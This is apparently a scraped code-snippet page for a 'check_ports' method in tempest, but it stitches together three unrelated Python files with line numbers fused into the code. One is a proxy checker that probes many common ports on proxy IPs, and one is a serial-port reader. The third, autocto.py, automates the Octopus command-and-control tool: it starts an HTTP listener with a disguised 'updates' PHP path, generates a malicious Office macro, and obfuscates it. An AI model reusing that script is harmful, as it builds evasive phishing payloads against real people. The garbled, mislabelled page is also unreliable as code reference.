How to use check_ports method in tempest

Best Python code snippet using tempest_python

check_proxy.py

Source:check_proxy.py Github

copy

Full Screen

1# -*- coding: utf-8 -*-2import requests3import arrow4import time5import logging6import re7import logging8from concurrent.futures import ThreadPoolExecutor9from requests.exceptions import ConnectionError10from proxy_pool import Session11from proxy_pool.models import Ip12from proxy_pool import utils13class check_proxy(object):14 check_urls_str = {15 'http://www.baidu.com': '百度',16 'http://www.qq.com': '腾讯',17 'http://www.ccidcom.com/': '通信',18 'https://www.taobao.com/': '淘宝',19 'https://www.zhihu.com/': '知乎',20 'https://www.baidu.com': '百度',21 }22 check_urls = {23 'http': [24 'http://www.baidu.com', 'http://www.qq.com',25 'http://www.ccidcom.com/'26 ],27 'https': [28 'https://www.taobao.com/', 'https://www.zhihu.com/',29 'https://www.baidu.com'30 ]31 }32 check_ports = {33 80: 500,34 8080: 100,35 3128: 100,36 8081: 100,37 9080: 100,38 1080: 100,39 21: 300,40 23: 200,41 53: 300,42 1863: 200,43 2289: 100,44 443: 500,45 69: 100,46 22: 500,47 25: 200,48 110: 200,49 7001: 100,50 9090: 100,51 3389: 500,52 1521: 500,53 1158: 300,54 2100: 100,55 1433: 200,56 3306: 500,57 5631: 100,58 5632: 100,59 5000: 200,60 8888: 20061 }62 def run(self):63 while 1:64 ip_list = self.get_proxy_list()65 if (not ip_list):66 return False67 pool = ThreadPoolExecutor(max_workers=100)68 threads = []69 for _info in ip_list:70 threads.append(71 pool.submit(72 self.check_ip,73 _info.ip,74 _info.port,75 _info.http_type,76 _info.score,77 is_new=178 if _info.create_time == _info.update_time else 0))79 pool.shutdown()80 def get_proxy_list(self):81 session = Session()82 try:83 lists = session.query(Ip).filter(Ip.score > 0).order_by(84 Ip.update_time.desc()).with_entities(85 Ip.id, Ip.ip, Ip.port, Ip.http_type, Ip.score,86 Ip.create_time, Ip.update_time).all()87 return lists88 except Exception as e:89 logging.exception(e)90 return False91 def check_ip(self, ip, port, http_type, score, is_new=1):92 open_ports = self.check_port(ip, port)93 session = Session()94 if open_ports is False:95 try:96 session.query(Ip).filter(Ip.ip == ip).filter(97 Ip.port == port).update({98 'score': 0,99 'update_time': arrow.now().datetime100 })101 session.commit()102 except Exception as e:103 logging.exception(e)104 session.rollback()105 logging.warning('%s:%d ---- 端口未开放' % (ip, int(port)))106 return False107 _update_data = {108 'open_port': ','.join(map(lambda x: str(x), open_ports)),109 'update_time': arrow.now().datetime110 }111 if is_new == 1:112 new_http_type = self.check_http_type(ip, port)113 if (new_http_type):114 _update_data['http_type'] = new_http_type115 speed_time = self.check_visit(ip, port, http_type)116 if speed_time is False:117 _update_data['score'] = score - 1 if score - 1 >= 0 else 0118 logging.warning('%s:%d ------ 无法访问' % (ip, int(port)))119 else:120 _update_data['score'] = score + 1 if score + 1 <= 5 else 5121 _update_data['speed'] = speed_time122 _update_data['weight'] = self.calculate_weight(123 score, speed_time, open_ports)124 logging.info('%s:%d ------ 代理有效, speed:%d, open_ports:%s' %125 (ip, port, speed_time, _update_data['open_port']))126 if utils.check_network():127 try:128 session.query(Ip).filter(Ip.ip == ip).filter(129 Ip.port == port).update(_update_data)130 session.commit()131 except Exception as e:132 logging.exception(e)133 session.rollback()134 def check_http_type(self, ip, port):135 check_urls = self.check_urls['http'] + self.check_urls['https']136 success_visit_count = {137 'http': len(self.check_urls['http']),138 'https': len(self.check_urls['https'])139 }140 for _url in check_urls:141 try:142 requests.get(143 _url,144 timeout=5,145 proxies={146 'http': 'http://%s:%d' % (ip, port),147 'https': 'http://%s:%d' % (ip, port)148 })149 except ConnectionError:150 if _url[0:5] == 'https':151 success_visit_count['https'] -= 1152 elif _url[0:4] == 'http':153 success_visit_count['http'] -= 1154 except Exception:155 pass156 if success_visit_count['http'] > 0 and success_visit_count[157 'https'] == 0:158 return 1159 elif success_visit_count['https'] > 0 and success_visit_count[160 'http'] == 0:161 return 2162 elif success_visit_count['https'] > 0 and success_visit_count['http'] > 0:163 return 3164 else:165 return False166 def check_visit(self, ip, port, http_type):167 if http_type == 1:168 check_urls = self.check_urls['http']169 elif http_type == 2:170 check_urls = self.check_urls['https']171 elif http_type == 3:172 check_urls = self.check_urls['http'] + self.check_urls['https']173 total_speed_time = 0174 visit_success_count = 0175 for _url in check_urls:176 _start_time = time.time()177 try:178 result = requests.get(179 _url,180 timeout=5,181 proxies={182 'http': 'http://%s:%d' % (ip, port),183 'https': 'http://%s:%d' % (ip, port)184 })185 if self.check_html_title(result.text,186 self.check_urls_str.get(_url)):187 total_speed_time += int((time.time() - _start_time) * 1000)188 visit_success_count += 1189 except Exception:190 pass191 if total_speed_time == 0 or visit_success_count == 0:192 return False193 else:194 total_speed_time += (len(check_urls) - visit_success_count) * 5000195 visit_success_count = len(check_urls)196 return int(total_speed_time / visit_success_count)197 def check_html_title(self, html, check_str):198 title = re.findall('<title>(.*?)<\/title>', html)199 if title and check_str in title[0]:200 return True201 else:202 return False203 def check_port(self, ip, port):204 check_ports = list(self.check_ports.keys())205 check_ports.append(port)206 check_ports = list(set(check_ports))207 ok_ports = []208 for _port in check_ports:209 if utils.check_port(ip, _port):210 ok_ports.append(_port)211 if port not in ok_ports:212 return False213 return ok_ports214 def calculate_weight(self, score, speed_time, open_ports):215 _weight = score * 1000216 for _port in open_ports:217 if _port in self.check_ports:218 _weight += self.check_ports.get(_port)219 else:220 _weight += 1221 _weight += 10000 - speed_time...

Full Screen

Full Screen

autocto.py

Source:autocto.py Github

copy

Full Screen

1import subprocess,os,time,random2# This is an automation script for Octubos Build by Reuvein Vinokurov & Chananel Gerstensang3os.system("export PATH=/home/ubuntu/vba_obfus/vba_obfuscator/:$PATH")4operation_name = input("Please Provide Operation Name: ")5#operation_name = "Test2"6macro_name = input("Please Provide name for the Macro File: ")7#macro_name = "macro3.macro"8#port_number = input("Please provide Port number: ")9check_ports = subprocess.Popen(["netstat", "-na"], stdout=subprocess.PIPE , stdin=subprocess.PIPE)10port_number = 808011while len(subprocess.Popen(['grep %s'%port_number], stdin=check_ports.stdout, stdout=subprocess.PIPE,shell=True).communicate()[0]) > 0:12 port_number = port_number+113 check_ports.stdout.close()14 check_ports = subprocess.Popen(["netstat", "-na"], stdout=subprocess.PIPE , stdin=subprocess.PIPE)15check_ports.stdout.close()16print("Port %s it is."%port_number)17#port = os.system("netstat -anolp | grep "+port_number)18# Writing all the logs from the process into "file.txt"19log = open('file.txt', 'a')20#subprocess.Popen(["ps aux", 'grep "python3 octopus.py ','wc -l'])21p1 = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE)22p2 = subprocess.Popen(['grep "python3 octopus.py fakeit"'], stdin=p1.stdout, stdout=subprocess.PIPE,shell=True)23p1.stdout.close()24p3 = subprocess.Popen(['wc', '-l'], stdin=p2.stdout, stdout=subprocess.PIPE)25p2.stdout.close()26process_count = p3.communicate()[0].strip()27if len(process_count) == 0:28 process_count=129process_count = int(process_count)-130print("Number of processes: %s"%(process_count))31if process_count < 1:32 p = subprocess.Popen(["nohup","python3","octopus.py","fakeit"], stdout=subprocess.PIPE , stdin=subprocess.PIPE)33else:34 p1 = subprocess.Popen(['ps', 'aux'], stdout=subprocess.PIPE)35 p2 = subprocess.Popen(['grep "python3 octopus.py fakeit"'], stdin=p1.stdout, stdout=subprocess.PIPE,shell=True)36 p1.stdout.close()37 p3 = subprocess.Popen(['grep', '-v', 'grep'], stdin=p2.stdout, stdout=subprocess.PIPE)38 p2.stdout.close()39 p4 = subprocess.Popen(['tr -s " "'], stdin=p3.stdout, stdout=subprocess.PIPE, shell=True)40 p3.stdout.close()41 p5 = subprocess.Popen(['cut -d " " -f2'], stdin=p4.stdout, stdout=subprocess.PIPE, shell=True)42 p4.stdout.close()43 process_id = int(p5.communicate()[0].strip())44 print("Octopus process id: %s"%process_id)45 print("reptyr -s %s"%process_id)46 p = subprocess.Popen(["reptyr", "-s", "%s"%process_id], stdout=subprocess.PIPE, stdin=subprocess.PIPE)47a = ("listen_http 0.0.0.0 "+str(port_number)+" #YOUR MEACHINE IP# 5 updates-" + str(random.randint(0,1000000)) + ".php "+operation_name+"\n").encode()48b = ("generate_macro "+operation_name+" "+macro_name+"\n").encode()49p.stdin.write(a)50p.stdin.flush()51p.stdin.write(b)52p.stdin.flush()53time.sleep(3)54cur_dir = os.path.abspath(".")55os.system("mv %s/%s %s/macro/%s.macro"%(cur_dir, macro_name, cur_dir, macro_name))56os.system("python3 /home/ubuntu/vba_obfus/vba-obfuscator/obfuscate.py %s/macro/%s.macro --output %s/macro/%s.obfuscated"%(cur_dir,macro_name,cur_dir,macro_name))...

Full Screen

Full Screen

simonSerial.py

Source:simonSerial.py Github

copy

Full Screen

1import time2import serial.tools.list_ports as stlp3import serial4import threading5import algorithm6import simulation7# BEGIN PARAMETER SECTION -----------------8CHECK_PORTS = True9BAUD_RATE = 11520010DATA_HX_SIZE = 10011# END PARAMETER SECTION -----------------12all_data = []13found_port = False14using_sim = False15comport = "COM6"16if (CHECK_PORTS):17 print("Seraching COM ports...")18 ports = stlp.comports()19 for port in ports:20 if(port.description[0:9] == "P1 Serial"):21 comport = port.device22 found_port = True23 # print(port.description + " found!")24if not found_port and CHECK_PORTS:25 raise SystemError("Particle Photon not connected.")26serialPort = serial.Serial(comport, BAUD_RATE)27print("Serial port " + comport + " opened at " + str(BAUD_RATE) + " baud.")28def begin_sim():29 global render, my_simulation, using_sim30 using_sim = True31 render = simulation.Render()32 my_simulation = threading.Thread(target=render.begin)33 my_simulation.start()34def update():35 binaryData = serialPort.readline()36 if binaryData is not None:37 textData = binaryData.decode().rstrip()38 dataValues = textData.split(",")39 all_data.append(algorithm.parse_data(dataValues))40 if(len(all_data) > DATA_HX_SIZE):41 all_data.pop(0)42 angles = algorithm.execute(all_data)43 if using_sim and render.reference is not None:44 render.reference.angles[0] = angles45 return [dataValues, angles]46def main():47 begin_sim()48 while True:49 update()50 if using_sim and not my_simulation.is_alive():51 break52if __name__ == "__main__":53 try:54 main()55 except KeyboardInterrupt:56 pass57 except:...

Full Screen

Full Screen

Automation Testing Tutorials

Learn to execute automation testing from scratch with LambdaTest Learning Hub. Right from setting up the prerequisites to run your first automation test, to following best practices and diving deeper into advanced test scenarios. LambdaTest Learning Hubs compile a list of step-by-step guides to help you be proficient with different test automation frameworks i.e. Selenium, Cypress, TestNG etc.

LambdaTest Learning Hubs:

YouTube

You could also refer to video tutorials over LambdaTest YouTube channel to get step by step demonstration from industry experts.

Run tempest automation tests on LambdaTest cloud grid

Perform automation testing on 3000+ real desktop and mobile devices online.

Try LambdaTest Now !!

Get 100 minutes of automation test minutes FREE!!

Next-Gen App & Browser Testing Cloud

Was this article helpful?

Helpful

NotHelpful